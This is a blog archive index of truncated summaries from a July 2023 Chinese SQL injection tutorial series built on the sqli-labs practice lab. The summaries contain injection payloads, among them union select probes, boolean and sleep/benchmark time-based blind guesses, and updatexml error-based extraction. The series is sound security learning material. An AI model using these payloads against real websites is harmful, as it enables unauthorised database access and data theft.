07 2023 档案

5、其他位置的注入
摘要:limit注入 limit 注入,这个词是受注入位置 划分的。where id=xx 后面的, 也可以叫做 where注入。 limit union注入 没有order by 的情况 SQL: select * from users where id <= 100 limit 1 union sel 阅读全文
posted @ 2023-07-27 11:21 baiye1 阅读(105) 评论(0) 推荐(0)
3、布尔延时注入
摘要:延时函数 sleep(5); benchmark(50000000,sha1(1)); 获取数据库名 长度 and if((length(databse())=8),sleep(5),0)--+ 逐字猜解 and if((substr(databse(),1,1)='s'),sleep(5),0)- 阅读全文
posted @ 2023-07-27 10:58 baiye1 阅读(29) 评论(0) 推荐(0)
4、报错注入
摘要:updatexml( ) , concat() mysql> select updatexml(1,concat(0x7e,(select database()),0x7e),1); ERROR 1105 (HY000): XPATH syntax error: '~security~' updat 阅读全文
posted @ 2023-07-15 12:49 baiye1 阅读(66) 评论(0) 推荐(0)
2.2、字符串截取函数
摘要:substring() mysql> select substring('abc',1,1); + + | substring('abc',1,1) | + + | a | + + 1 row in set (0.00 sec) mid() mysql> select mid((select dat 阅读全文
posted @ 2023-07-13 17:02 baiye1 阅读(66) 评论(0) 推荐(0)
2.1、字符比较
摘要:strcmp() strcmp(str1 , str2 ) = return 0; < return -1; > return 1; mysql> select strcmp((substr(database(),1,1)),0x73); + + | strcmp((substr(database( 阅读全文
posted @ 2023-07-13 16:56 baiye1 阅读(42) 评论(0) 推荐(0)
2、布尔注入
摘要:获取数据库名 长度 ?id=2' and length(database())=8 --+ 逐字猜解 ?id=2' and substr(database(),1,1)='s' --+ ?id=2' and substr(database(),2,1)='e' --+ 获取数据表 长度 ?id=2' 阅读全文
posted @ 2023-07-12 13:36 baiye1 阅读(30) 评论(0) 推荐(0)
1、union 注入
摘要:其他情况的注入 单引号 括号?id=-1') union select 1,2,3 --+ 双引号 括号?id=-1") union select 1,2,3--+ 判断前面有多少列?id=2' order by 3--+ 确定显示位?id=2' and '1'='2' union select 1 阅读全文
posted @ 2023-07-11 18:45 baiye1 阅读(81) 评论(0) 推荐(0)
sqlilabs + phpstudy8.1
摘要:如果你的PHP study的版本是最新版7.x~下载新版sqli-labs: https://github.com/Rinkish/Sqli_Edited_Version 如果你的PHP study的版本是老版本: https://github.com/Audi-1/sqli-labs 阅读全文
posted @ 2023-07-11 10:21 baiye1 阅读(27) 评论(0) 推荐(0)